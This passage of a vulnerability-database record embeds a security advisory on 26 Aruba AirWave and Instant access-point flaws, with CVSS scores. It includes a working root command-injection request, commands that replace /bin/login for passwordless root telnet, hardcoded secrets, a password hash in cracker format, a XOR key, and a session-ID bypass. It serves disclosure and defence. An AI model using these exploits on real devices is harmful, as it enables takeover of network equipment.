            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 7.5,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "JVNDB-2016-009617",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2016-2032",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "NVD",
            "id": "JVNDB-2016-009617",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201607-363",
            "trust": 0.6,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-009617"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201607-363"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-2032"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "A vulnerability exists in the Aruba AirWave Management Platform 8.x prior to 8.2 in the management interface of an underlying system component called RabbitMQ, which could let a malicious user obtain sensitive information. This interface listens on TCP port 15672 and 55672. Multiple Arubanetworks Products are prone to multiple security vulnerabilities. \nAttackers can exploit these issues to bypass security restrictions and  perform unauthorized actions, obtain sensitive information, execute  arbitrary code in the context of the affected application. Failed  exploit attempts will likely result in denial-of-service conditions. \nFollowing products and versions are affected:\nArubaOS (all versions)  are vulnerable. \nAruba Instant (all versions up to, but not including, 4.1.3.0 and 4.2.3.1)  are vulnerable. The\nVulnerabilities were discovered during a black box security assessment and\ntherefore the vulnerability list should not be considered exhaustive. Several\nof the high severity vulnerabilities listed in this report are related to the\nAruba proprietary PAPI protocol and allow remote compromise of affected devices. AMP: RabbitMQ Management interface exposed\n 2. AMP: XSRF token uses weak calculation algorithm\n 3. AMP: Arbitrary modification of /etc/ntp.conf\n 4. AMP: PAPI uses static key for calculating validation checksum (auth bypass)\n 5. (I)AP: Insecure transmission of login credentials (GET)\n 6. (I)AP: Built in privileged \"support\" account\n 7. (I)AP: Static password hash for support account\n 8. (I)AP: Unusual account identified (\"arubasecretadmin\")\n 9. (I)AP: Privileged remote code execution\n10. (I)AP: Radius passwords allow arbitrary raddb commands\n11. (I)AP: Unauthenticated disclosure of environment variables\n12. (I)AP: Information disclosure by firmware checking functionality\n13. (I)AP: Unauthenticated automated firmware update requests\n14. (I)AP: Firmware updater does not check certificates\n15. (I)AP: Forceful downgrade of FW versions possible\n16. (I)AP: Firmware update check discloses machine certificate\n17. (I)AP: Firmware is downloaded via unencrypted connection\n18. (I)AP: Firmware update Challenge/Response does not protect the Client\n19. (I)AP: Unencrypted private keys and certs\n20. (I)AP: Potential signature private key\n21. (I)AP: PAPI Endpoints exposed to all interfaces\n22. (I)AP: PAPI Endpoint does not validate MD5 signatures\n23. (I)AP: PAPI protocol encrypted with weak encryption algorithm\n24. (I)AP: PAPI protocol authentication bypass\n25. (I)AP: Broadcast with detailed system information (LLDP)\n26. (I)AP: User passwords are encrypted with a static key\n\n\nVulnerability Details\n=====================\n\n---------------------------------------------\n1. AMP: RabbitMQ Management interface exposed\n---------------------------------------------\n\nAMPs expose the management frontend for the RabbitMQ message queue on all\ninterfaces via tcp/15672 and tcp/55672. \n\n  # netstat -nltp | grep beam\n  tcp        0      0 127.0.0.1:5672              0.0.0.0:*\n       LISTEN      2830/beam.smp\n  tcp        0      0 127.0.0.1:17716             0.0.0.0:*\n       LISTEN      2830/beam.smp\n  tcp        0      0 0.0.0.0:15672               0.0.0.0:*\n       LISTEN      2830/beam.smp\n  tcp        0      0 0.0.0.0:55672               0.0.0.0:*\n       LISTEN      2830/beam.smp\n\nThe password for the default user \"airwave\" is stored in the world readable\nfile /etc/rabbitmq/rabbitmq.config in plaintext:\n\n  # ls -l /etc/rabbitmq/rabbitmq.config\n  -rw-r--r-- 1 root root 275 Oct 28 15:48 /etc/rabbitmq/rabbitmq.config\n  # grep default_ /etc/rabbitmq/rabbitmq.config\n          {default_user,\u003c\u003c\"airwave\"\u003e\u003e},\n          {default_pass,\u003c\u003c\"***REMOVED***\"\u003e\u003e}\n\n--------------------------------------------------\n2. AMP: XSRF token uses weak calculation algorithm\n--------------------------------------------------\n\nThe XSRF token is calculated based on limited sources of entropy, consisting of\nthe user\u0027s time of login and a random number between 0 and 99999. The algorithm\nIs approximated by the following example Python script:\n\n  base64.b64encode(hashlib.md5(\u0027%d%5.5d\u0027 % (int(time.time()),\nrandom.randint(0,99999))).digest())\n\n\n-----------------------------------------------\n3. AMP: Arbitrary modification of /etc/ntp.conf\n-----------------------------------------------\n\nIncorrect/missing filtering of input parameters allows injecting new lines and\narbitrary commands into /etc/ntp.conf, when updating the NTP settings via the\nweb frontend. \n\n  POST /nf/pref_network? HTTP/1.1\n  Host: 192.168.131.162\n  [...]\n\n  id=\u0026ip_1=192.168.131.162\u0026hostname_1=foo.example.com\u0026\n  subnet_mask_1=255.255.255.248\u0026gateway_1=192.168.131.161\u0026dns1_1=172.16.255.1\u0026\n  dns2_1=\u0026eth1_enabled_1=0\u0026eth1_ip_1=\u0026eth1_netmask_1=\u0026\n  ntp1_1=time1.example.com%0afoo\u0026ntp2_1=time2.example.com\u0026save=Save\n\nThe above POST requests results in the following ntp.conf being generated:\n\n  # cat /etc/ntp.conf\n  [...]\n  server time1.example.com\n  foo\n  server time2.example.com\n\n------------------------------------------------------------------------------\n4. AMP: PAPI uses static key for calculating validation checksum (auth bypass)\n------------------------------------------------------------------------------\n\nPAPI packets sent from an AP to an AMP are authenticated with a cryptographic\nchecksum. The packet format is only partially known, as it\u0027s a proprietary\nformat created by Aruba. A typical PAPI packet sent to an AMP is as follows:\n\n\n  0000   49 72 00 02 64 69 86 2d 7f 00 00 01 01 00 01 00  Ir..di.-........ \n  0010   20 1f 20 1e 00 01 00 00 00 01 3e f9 22 49 05 b3   . .......\u003e.\"I.. \n  0020   50 89 40 d3 5d 9d d6 af 46 98 c1 a6              P.@.]...F... \n\n\nThe following dissection of the above shown packet gives a more detailed\noverview of the format:\n\n  49 72                                                 ID\n  00 02                                                 Version\n  64 69 86 2d                                           PAPI Destination IP\n  7f 00 00 01                                           PAPI Source IP\n  01 00                                                 Unknown1\n  01 00                                                 Unknown2\n  20 1f                                                 PAPI Source Port\n  20 1e                                                 PAPI Destination Port\n  00 01                                                 Unknown3\n  00 00                                                 Unknown4\n  00 01                                                 Sequence Number\n  3e f9                                                 Unknown5\n  22 49 05 b3 50 89 40 d3 5d 9d d6 af 46 98 c1 a6       Checksum\n\n\nThe checksum is based on a MD5 hash of a padded concatenation of all fields and\na secret token. The secret token is hardcoded in multiple binaries on the AMP\nand can easily be retrieved via core Linux system tools:\n\n  $ strings /opt/airwave/bin/msgHandler | grep asd\n  asdf;lkj763\n\nUsing this secret token it is possible to craft valid PAPI packets and issue\ncommands to the AMP, bypassing the authentication based on the shared\nsecret / token. This can be exploited to compromise of the device. \nRandom sampling of different software versions available on\nAruba\u0027s website confirmed that the shared secret is identical for all versions. \n\n-------------------------------------------------------\n5. AP: Insecure transmission of login credentials (GET)\n-------------------------------------------------------\n\nUsername and password to authenticate with the AP web frontend are transmitted\nthrough HTTP GET. This method should not be used in a form that transmits\nsensitive data, because the data is displayed in clear text in the URL. \n\n  GET /swarm.cgi?opcode=login\u0026user=admin\u0026passwd=admin HTTP/1.1\n\nThe login URL can potentially appear in Proxy logs, the server logs or\nbrowser history. This possibly discloses the authentication data to\nunauthorized persons. \n\n--------------------------------------------\n6. AP: Built in privileged \"support\" account\n--------------------------------------------\n\nThe APs provide a built in system account called \"support\". When connected to\nthe restricted shell of the AP via SSH, issuing the command \"support\", triggers\na password request:\n\n\n  00:0b:86:XX:XX:XX# support\n  Password:\n\nA quick internet search clarified, that this password is meant for use by Aruba\nengineers only:\nhttp://community.arubanetworks.com/t5/Unified-Wired-Wireless-Access/OS5-0-support-password/td-p/26760\n\nFurther research on that functionality lead to the conclusion that this\nfunctionality provides root-privileged shell access to the underlying operating\nsystem of the AP, given the correct password is entered. \n\n-----------------------------------------------\n7. AP: Static password hash for support account\n-----------------------------------------------\n\nThe password hash for the \"support\" account mentioned in vulnerability #6 is\nstored in plaintext on the AP. \n\n  $ strings /aruba/bin/cli | grep ^bc5\n  bc54907601c92efc0875233e121fd3f1cebb8b95e2e3c44c14\n\nRandom sampling of different versions of Firmware images available on Aruba\u0027s\nwebsite confirmed that the password hash is identical for all versions. The\npassword check validating a given \"support\" password is based on the following\nalgorithm:\n\n  SALT + sha1(SALT + PASSWORD)\n\nWhere SALT equals the first 5 bytes of the password hash in binary\nrepresentation. It is possible to run a brute-force attack on this hash format\nusing JtR with the following input format:\n\n  support:$dynamic_25$c92efc0875233e121fd3f1cebb8b95e2e3c44c14$HEX$bc54907601\n\n------------------------------------------------------\n8. AP: Unusual account identified (\"arubasecretadmin\")\n------------------------------------------------------\n\nThe AP\u0027s system user configuration contains a undocumented account called\n\"arubasecretadmin\". This account was the root cause for CVE-2007-0932 and\nallowed administrative login with a static password. \n\n  /etc/passwd:\n  nobody:x:99:99:Nobody:/:/sbin/nologin\n  root:x:0:0:Root:/:/bin/sh\n  admin:x:100:100:Admin:/:/bin/telnet3\n  arubasecretadmin:x:101:100:Aruba Admin:/:/bin/telnet2\n  serial:x:102:100:Serial:/:/bin/telnet4\n\nFurther tests indicated that login with this account seems not possible as it\nis not mapped through Arubas authentication mechanisms. The reason for it being\nstill configured on the system is unknown. \n\n---------------------------------------\n9. AP: Privileged remote code execution\n---------------------------------------\n\nInsufficient checking of parameters allows an attacker to execute commands\nwith root privileges on the AP. The vulnerable parameter is \"image_url\" which\nis used in the Firmware update function. \n\n  GET /swarm.cgi?opcode=image-url-upgrade\u0026ip=127.0.0.1\u0026oper_id=6\u0026image_url=Aries@http://10.0.0.1/?\"`/usr/sbin/mini_httpd+-d+/+-u+root+-p+1234+-C+/etc/mini_httpd.conf`\"\u0026auto_reboot=false\u0026refresh=true\u0026sid=OWsiU5MM7DxVf9FRWe3P\u0026nocache=0.9368100591919084\nHTTP/1.1\n\nThe above example starts a new instance of mini_httpd on tcp/1234, which allows\nbrowsing the AP\u0027s filesystem. The following list of commands, if executed in\norder, start a telnet service that allows passwordless root login. \n\n  killall -9 utelnetd\n  touch /tmp/telnet_enable\n  echo \\#\\!/bin/sh \u003e /bin/login\n  echo /bin/sh \u003e\u003e /bin/login\n  chmod +x /bin/login\n  /sbin/utelnetd\n\nConnecting to the telnet service started by the above command chain:\n\n  # telnet 10.0.XX.XX\n  Trying 10.0.XX.XX... \n  Connected to 10.0.XX.XX. \n  Escape character is \u0027^]\u0027. \n  Switching to Full Access\n  /aruba/bin # echo $USER\n  root\n  /aruba/bin #\n\nPotential exploits of this vulnerability can be detected through the\nAP\u0027s log file:\n  [...]\n  Jan  1 02:43:47  cli[2052]: \u003c341004\u003e \u003cWARN\u003e |AP\n00:0b:86:XX:XX:XX2@10.0.XX.XX cli|\nhttp://10.0.XX.XX/?\"`/sbin/utelnetd`\"\n  [...]\n\n-------------------------------------------------------\n10. AP: Radius passwords allow arbitrary raddb commands\n-------------------------------------------------------\n\nInsufficient checking of the GET parameter \"cmd\" allows the injection of\narbitrary commands and configuration parameters in the raddb configuration. \n\nExample:\n  GET /swarm.cgi?opcode=config\u0026ip=127.0.0.1\u0026cmd=%27user%20foo%20foo%22,my-setting%3d%3d%22blah%20portal%0Ainbound-firewall%0Ano%20rule%0Aexit%0A%27\u0026refresh=false\u0026sid=Lppj9jT2xQmYKqjEx5eP\u0026nocache=0.10862623626107548\nHTTP/1.1\n\n  /aruba/radius/raddb/users:\n  foo Filter-Id == MAC-GUEST, Cleartext-Password := \"foo\",my-setting==\"blah\"\n\n\nAs shown in the above example, inserting a double-quote in the password allows\nto add additional commands after the password. \n\n-----------------------------------------------------------\n11. AP: Unauthenticated disclosure of environment variables\n-----------------------------------------------------------\n\nIt is possible to request a listing of environment variables by requesting a\nspecific URL on the AP\u0027s web server. The request does not require\nauthentication. \n\n  GET /swarm.cgi?opcode=printenv HTTP/1.1\n\n  HTTP/1.0 200 OK\n  Content-Type:text/plain; charset=utf-8\n  Pragma: no-cache\n  Cache-Control: max-age=0, no-store\n\n  Environment variables\n\n  CHILD_INDEX=0\n  PATH=/usr/local/bin:/usr/ucb:/bin:/usr/bin\n  LD_LIBRARY_PATH=/usr/local/lib:/usr/lib\n  SERVER_SOFTWARE=\n  SERVER_NAME=10.0.XX.XX\n  GATEWAY_INTERFACE=CGI/1.1\n  SERVER_PROTOCOL=HTTP/1.0\n  SERVER_PORT=4343\n  REQUEST_METHOD=GET\n  SCRIPT_NAME=/swarm.cgi\n  QUERY_STRING=opcode=printenv\n  REMOTE_ADDR=10.0.XX.XX\n  REMOTE_PORT=58804\n  HTTP_REFERER=https://10.0.XX.XX:4343/\n  HTTP_USER_AGENT=Mozilla/5.0 (X11; Linux x86_64; rv:38.0)\nGecko/20100101 Firefox/38.0 Iceweasel/38.3.0\n  HTTP_HOST=10.0.XX.XX:4343\n\n-----------------------------------------------------------------\n12. AP: Information disclosure by firmware checking functionality\n-----------------------------------------------------------------\n\nWhen the AP checks device.arubanetworks.com for a new firmware version, it\nsends detailed information of the AP in plaintext to the remote host. \n\n  POST /firmware HTTP/1.1\n  Host: device.arubanetworks.com\n  Content-Length: 2\n  Connection: keep-alive\n  X-Type: firmware-check\n  X-Guid: 2dbe42XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\n  X-OEM-Tag: Aruba\n  X-Mode: IAP\n  X-Factory-Default: Yes\n  X-Current-Version: 6.4.2.6-4.1.1.10_51810\n  X-Organization: ***REMOVED (Company Internal Name)***\n  X-Ap-Info: CC00XXXXX, 00:0b:86:XX:XX:XX, RAP-155\n  X-Features: 0000100001001000000000000000000000000000000000010000000\n\n----------------------------------------------------------\n13. AP: Unauthenticated automated firmware update requests\n----------------------------------------------------------\n\nThe web frontend of the AP provides functionality to initiate an automated\nfirmware update. Doing so triggers the AP to initiate communication with\ndevice.arubanetworks.com and automatically download and install a new firmware\nimage. The CGI opcode for that automatic update is \"image-server-check\" and it\nwas discovered that the \"sid\" parameter is not checked for this opcode. Therefor\nan attacker can issue the automatic firmware update without authentication by\nsending the following GET request to the AP. \n\n  GET /swarm.cgi?opcode=image-server-check\u0026ip=127.0.0.1\u0026sid=x\n\nAs shown above, the \"sid\" parameter has to be submitted as part of the URL, but\ncan be set to anything. Although all opcode actions follow the same calling\nscheme, \"image-server-check\" was the only opcode where the session ID was not\nvalidated. \n\nCombined with other vulnerabilities (#14, #15), this could be exploited to\ninstall an outdated, vulnerable firmware on the AP. \n\n----------------------------------------------------\n14. AP: Firmware updater does not check certificates\n----------------------------------------------------\n\nThe communication between AP and device.arubanetworks.com is secured by using\nSSL. The AP does not do proper certificate validation for the communication to\ndevice.arubanetworks.com. A typical SSL MiTM attack using DNS spoofing and a\nself-signed certificate allowed interception of the traffic between AP and\ndevice.arubanetworks.com. \n\n--------------------------------------------------\n15. AP: Forceful downgrade of FW versions possible\n--------------------------------------------------\n\nWhen checking device.arubanetworks.com for a new firmware image, the AP sends\nit\u0027s current version to the remote host. If there is no new firmware available,\ndevice.arubanetworks.com does not provide any download options. If the initial\nversion sent from the AP is modified by an attacker (via MiTM), the remote\nserver will reply with the current firmware version. The AP will then reject\nthat firmware, as it\u0027s current version is more recent/the same. Downgrading the\nversion does also not work based on the validation the AP does. \nThis behaviour can be overwritten if an attacker intercepts and modifies the\nreply from device.arubanetworks.com and adds X-header called\n\"X-Mandatory-Upgrade\". \n\nExample of a spoofed reply from device.arubanetworks.com:\n\n  HTTP/1.0 200 OK\n  Date: Wed, 11 Nov 2015 12:12:20 GMT\n  Content-Length: 91\n  Content-Type: text/plain; charset=UTF-8\n  X-Activation-Key: FXXXXXXX\n  X-Session-Id: 05d607dd-958b-42c4-a355-bd54e1a32e8e\n  X-Status-Code: success\n  X-Type: firmware-check\n  X-Mandatory-Upgrade: true\n  Connection: close\n\n\n  6.4.2.6-4.1.1.10_51810\n  23 http://10.0.0.1:4321/ArubaInstant_Aries_6.4.2.6-4.1.1.10_51810\n\n\nAs shown above, the Header \"X-Mandatory-Upgrade\" was added to the server\u0027s\nreply. This causes the AP to skip its validation checks and accept any firmware\nversion provided, regardless if it is the same or older than the current one. \n\n-----------------------------------------------------------\n16. AP: Firmware update check discloses machine certificate\n-----------------------------------------------------------\n\nWhile observing the traffic between an AP and device.arubanetworks.com, it was\ndiscovered that the AP discloses it\u0027s machine certificate to the remote\nendpoint. \n\n  POST /firmware HTTP/1.1\n  Host: 10.0.XX.XX\n  Content-Length: 2504\n  Connection: close\n  X-Type: firmware-check\n  X-Guid: 2dbe42XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\n  X-OEM-Tag: Aruba\n  X-Mode: IAP\n  X-Factory-Default: Yes\n  X-Session-Id: e0b24fb1-e2f7-4e06-9473-1266b50a3fec\n  X-Current-Version: 6.4.2.6-4.1.1.10_51810\n  X-Organization: ***REMOVED (Company Internal Name)***\n  X-Ap-Info: CC00XXXXX, 00:0b:86:XX:XX:XX, RAP-155\n  X-Features: 0000100001001000000000000000000000000000000000010000000\n  X-Challenge-Hash: SHA-1\n\n\n  -----BEGIN CERTIFICATE-----\n  MIIGTjCCBTagAwI... \n  [...]\n  -----END CERTIFICATE-----\n\n\nThe certificate sent in the above request is the same (in PEM format) as found\nunder the following path on the AP:\n\n  /tmp/deviceCerts/certifiedKeyCert.der\n\nComparison of the certificate from the HTTP Request and from the AP filesystem:\n\n  $ sha256sum dumped-fw-cert.txt certifiedKeyCert.der.pem\n  68ebb521dff53d8dcb8e4a0467dcae38cf45a0d812897393632bdd9ef6f354e8\ndumped-fw-cert.txt\n  68ebb521dff53d8dcb8e4a0467dcae38cf45a0d812897393632bdd9ef6f354e8\ncertifiedKeyCert.der.pem\n\n---------------------------------------------------------\n17. AP: Firmware is downloaded via unencrypted connection\n---------------------------------------------------------\n\nFirmware images are downloaded via unencrypted HTTP to the AP. An example reply\ncontaining the download paths looks as follows:\n\n  HTTP/1.1 200 OK\n  Date: Wed, 11 Nov 2015 13:18:58 GMT\n  Content-Length: 552\n  Content-Type: text/plain; charset=UTF-8\n  X-Activation-Key: FXXXXXXX\n  X-Session-Id: 05d607dd-958b-42c4-a355-bd54e1a32e8e\n  X-Status-Code: success\n  X-Type: firmware-check\n  Connection: close\n\n\n  6.4.2.6-4.1.1.10_51810\n  25 http://images.arubanetworks.com/fwfiles/ArubaInstant_Centaurus_6.4.2.6-4.1.1.10_51810\n  30 http://images.arubanetworks.com/fwfiles/ArubaInstant_Taurus_6.4.2.6-4.1.1.10_51810\n  15 http://images.arubanetworks.com/fwfiles/ArubaInstant_Cassiopeia_6.4.2.6-4.1.1.10_51810\n  10 http://images.arubanetworks.com/fwfiles/ArubaInstant_Orion_6.4.2.6-4.1.1.10_51810\n  23 http://images.arubanetworks.com/fwfiles/ArubaInstant_Aries_6.4.2.6-4.1.1.10_51810\n  26 http://images.arubanetworks.com/fwfiles/ArubaInstant_Pegasus_6.4.2.6-4.1.1.10_51810\n\nAn attacker could potentially MiTM connections to images.arubanetworks.com and\npossibly replace the firmware images downloaded by the AP. \n\n----------------------------------------------------------------------\n18. AP: Firmware update Challenge/Response does not protect the Client\n----------------------------------------------------------------------\n\nThe update check process between AP and device.arubanetworks.com works\nas follows:\n\n  AP =\u003e device.arubanetworks.com\n  POST /firmware\n  X-Type: firmware-check\n\n  AP \u003c= device.arubanetworks.com\n        200 OK\n        X-Session-Id: bd4... \n        X-Challenge: 123123... \n\n  AP =\u003e device.arubanetworks.com\n  POST /firmware\n  X-Session-Id: bd4... \n\n  [machine certificate]\n  [signature]\n\n  AP \u003c= device.arubanetworks.com\n        200 OK\n        X-Session-Id: bd4... \n\n        [firmware image urls]\n\nWhen inspecting the communication process carefully, it is clear that the final\nresponse from device.arubanetworks.com does not contain any (cryptographic)\nsignature. An attacker could impersonate device.arubanetworks.com, send an\narbitrary challenge, ignore the response and just reply with a list of firmware\nimages. The only thing that has to be kept the same over requests is the\nX-Session-Id header, which is also sent initially by the remote host and not\nthe AP and therefore under full control of the attacker. \n\n------------------------------------------\n19. AP: Unencrypted private keys and certs\n------------------------------------------\n\nThe AP firmware image contains the unencrypted private key and certificate for\nsecurelogin.arubanetworks.com issued by GeoTrust and valid until 2017. The key\nand cert was found under the path /aruba/conf/cpprivkey.pem. \n\n  $ openssl x509 -in cpprivkey.pem -text -noout\n  Certificate:\n      Data:\n          Version: 3 (0x2)\n          Serial Number: 121426 (0x1da52)\n      Signature Algorithm: sha1WithRSAEncryption\n          Issuer: C=US, O=GeoTrust Inc., OU=Domain Validated SSL,\nCN=GeoTrust DV SSL CA\n          Validity\n              Not Before: May 11 01:22:10 2011 GMT\n              Not After : Aug 11 04:40:59 2017 GMT\n          Subject: serialNumber=lLUge2fRPkWcJe7boLSVdsKOFK8wv3MF,\nC=US, O=securelogin.arubanetworks.com, OU=GT28470348, OU=See\nwww.geotrust.com/resources/cps (c)11, OU=Domain Control Validated -\nQuickSSL(R) Premium, CN=securelogin.arubanetworks.com\n  [...]\n\n  $ openssl rsa -in cpprivkey.pem -check\n  RSA key ok\n  writing RSA key\n  -----BEGIN RSA PRIVATE KEY-----\n  MIIEpQIBAAKCAQEA\u2026. \n  [...]\n  -----END RSA PRIVATE KEY-----\n\n---------------------------------------\n20. AP: Potential signature private key\n---------------------------------------\n\nA potential SSL key was found under the path /etc/sig.key. Based on the header\n(3082xxxx[02,03]82), the file looks like a SSL key in DER format:\n\n$ xxd etc/sig.key\n00000000: 3082 020a 0282 0201 00d9 2d71 db0f decb  0.........-q.... \n\nIt was not possible to decode the key. Therefore it\u0027s not 100% clear if is an\nactual key or just a garbaged file. \n\n------------------------------------------------\n21. AP: PAPI Endpoints exposed to all interfaces\n------------------------------------------------\n\nThe PAPI endpoint \"msgHandler\" creates listeners on all interfaces. Therefore\nit is reachable via wired and wireless connections to the AP. This increases\nthe potential attack surface. \n\n  # netstat -nlu | grep :82\n  udp        0      0 :::8209                 :::*\n  udp        0      0 :::8211                 :::*\n\nAdditionally the local ACL table of the AP contains a default firewall rule,\npermitting any traffic to udp/8209-8211, overwriting any manually set ACL to\nblock access to PAPI:\n\n  00:0b:86:XX:XX:XX# show datapath acl 106\n  Datapath ACL 106 Entries\n  -----------------------\n  Flags: P - permit, L - log, E - established, M/e - MAC/etype filter\n        S - SNAT, D - DNAT, R - redirect, r - reverse redirect m - Mirror\n        I - Invert SA, i - Invert DA, H - high prio, O - set prio, C -\nClassify Media\n        A - Disable Scanning, B - black list, T - set TOS, 4 - IPv4, 6 - IPv6\n        K - App Throttle, d - Domain DA\n  ----------------------------------------------------------------\n   1:  any  any  17 0-65535 8209-8211  P4\n  [...]\n  12:  any  any  any  P4\n  00:0b:86:XX:XX:XX#\n\n------------------------------------------------------\n22. AP: PAPI Endpoint does not validate MD5 signatures\n------------------------------------------------------\n\nMD5 signature validation for incoming PAPI packets is disabled on the AP:\n\n  # ps | grep msgHandler\n   1988 root        508 S \u003c /aruba/bin/msgHandler -n\n\n  # /aruba/bin/msgHandler -h\n  usage: msgHandler [-d] [-n]\n  -d = enable debug prints. \n  -n = disable md5 signatures. \n  -g = disable garbling. \n\nThe watchdog service (\"nanny\") also restarts the PAPI handler with disabled MD5\nsignature validation:\n\n  # grep msgH /aruba/bin/nanny_list\n  RESTART /aruba/bin/msgHandler -n\n\n--------------------------------------------------------------\n23. AP: PAPI protocol encrypted with weak encryption algorithm\n--------------------------------------------------------------\n\nPAPI packets sent to an AP contain an encrypted payload. The encryption seems\nto replace the MD5 signature check as described in #4 and used when PAPI is\nsent from AP to AMP. This might also explain why the PAPI endpoint runs with\ndisabled MD5 signature verification on the AP (see #22). \n\nThe following example shows an encrypted PAPI packet for the command\n\"show version\" as received by the AP:\n\n  0000  49 72 00 03 7f 00 00 01 0a 00 00 01 00 00 20 13   Ir............ \n  0010  3b 60 3b 7e 20 04 00 00 00 03 00 00 00 00 00 00   ;`;~ ........... \n  0020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................ \n  0030  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................ \n  0040  00 00 00 00 00 00 00 00 00 00 00 00 97 93 93 93   ................ \n  0050  a9 97 93 93 92 6e 96 99 93 93 92 95 94 91 93 97   .....n.......... \n  0060  93 93 93 93 93 93 87 e9 eb e1 fc d0 dc c6 e4 fd   ................ \n  0070  fa e1 f7 e9 d1 a6 f7 e7 c5 eb f1 93 93 9e e0 fb   ................ \n  0080  fc e4 b3 e5 f6 e1 e0 fa fc fd 99                  ........... \n\nImportant parts of the above packet:\n\n  7f 00 00 01         Destination IP (127.0.0.1)\n  0a 00 00 01         Source IP (10.0.0.1)\n  3b 60               Destination Port (15200)\n  3b 7e               Source Port (15230)\n  97 93 93 93-EOF     Encrypted PAPI payload\n\nComparison of the above packet with a typical PAPI packet that is sent from the\nAP to the AMP quickly highlights the missing 0x00 that are used to pad certain\nfields of the PAPI payload. These 0x00 seem to be substituted with 0x93, which\nis a clear indication that the payload is \"encrypted\" with a 1 byte XOR. As\nXOR\u0027ing 0x00 with 1 byte results in the same byte, the payload therefore\ndiscloses the key used and use of the weak XOR algorithm:\n\n    0x00: 00000000\n  ^ 0x93: 10010011\n  ================\n          10010011 (0x93)\n\nThe following shows the above PAPI packet for \"show version\" with its payload\ndecrypted:\n\n  0000  49 72 00 03 7f 00 00 01 0a 00 00 01 00 00 20 13   Ir............ \n  0010  3b 60 3b 7e 20 04 00 00 00 03 00 00 00 00 00 00   ;`;~ ........... \n  0020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................ \n  0030  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................ \n  0040  00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00   ................ \n  0050  3a 04 00 00 01 fd 05 0a 00 00 01 06 07 02 00 04   :............... \n  0060  00 00 00 00 00 00 14 7a 78 72 6f 43 4f 55 77 6e   .......zxroCOUwn\n  0070  69 72 64 7a 42 35 64 74 56 78 62 00 00 0d 73 68   irdzB5dtVxb...sh\n  0080  6f 77 20 76 65 72 73 69 6f 6e 0a                  ow version. \n\n(The string starting with \"zxr...\" is a HTTP session ID, see #25 on details how\nto bypass this). \n\nAn example Python function for en-/decrypting PAPI payloads could look like\nthis:\n\n  def aruba_encrypt(s):\n    return \u0027\u0027.join([chr(ord(c) ^ 0x93) for c in s])\n\n-------------------------------------------\n24. AP: PAPI protocol authentication bypass\n-------------------------------------------\n\nBesides it\u0027s typical use between different Aruba devices, PAPI is also used as\nan inter-process communication (IPC) mechanism between the CGI based web\nfrontend and the backend processes on the AP. Certain commands that can be sent\nvia PAPI are only supposed to be used via this IPC interface and not from an\nexternal source. Besides the weak \"encryption\" that is described in #23, some\nPAPI packets contain a HTTP session ID (SID), that matches the SID issued at\nlogin to the web frontend. \n\nExample IPC packet (payload decrypted as shown in #23):\n\n  0000  49 72 00 03 7f 00 00 01 0a 00 00 01 00 00 20 13   Ir............ \n  0010  3b 60 3b 7e 20 04 00 00 00 03 00 00 00 00 00 00   ;`;~ ........... \n  0020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................ \n  0030  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................ \n  0040  00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00   ................ \n  0050  40 04 00 00 01 fd 05 0a 00 00 01 06 07 02 00 04   @............... \n  0060  00 00 00 00 00 00 14 7a 78 72 6f 43 4f 55 77 6e   .......zxroCOUwn\n  0070  69 72 64 7a 42 35 64 74 56 78 62 00 00 13 73 68   irdzB5dtVxb...sh\n  0080  6f 77 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e   ow configuration\n  0090  0a                                                . \n\nThe SID in the example shown is \"zxroCOUwnirdzB5dtVxb\". The 0x14 before that\nindicates the length of the 20 byte SID. If the session is expired or an\ninvalid session is specified, the packet is rejected by the PAPI endpoint\n(msgHandler). \n\nReplacing the 20 byte SID with 20 * 0x00, bypasses the SID check and therefore\nallows unauthenticated PAPI communication with the AP. \n\nExample IPC packet (Session ID replaced with 20 * 0x00, payload not XOR\u0027ed for\nreadability):\n\n  0000  49 72 00 03 7f 00 00 01 0a 00 00 01 00 00 20 13   Ir............ \n  0010  3b 60 3b 7e 20 04 00 00 00 03 00 00 00 00 00 00   ;`;~ ........... \n  0020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................ \n  0030  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................ \n  0040  00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00   ................ \n  0050  40 04 00 00 01 fd 05 0a 00 00 01 06 07 02 00 04   @............... \n  0060  00 00 00 00 00 00 14 00 00 00 00 00 00 00 00 00   ................ \n  0070  00 00 00 00 00 00 00 00 00 00 00 00 00 13 73 68   ..............sh\n  0080  6f 77 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e   ow configuration\n  0090  0a\n\nUsing the above 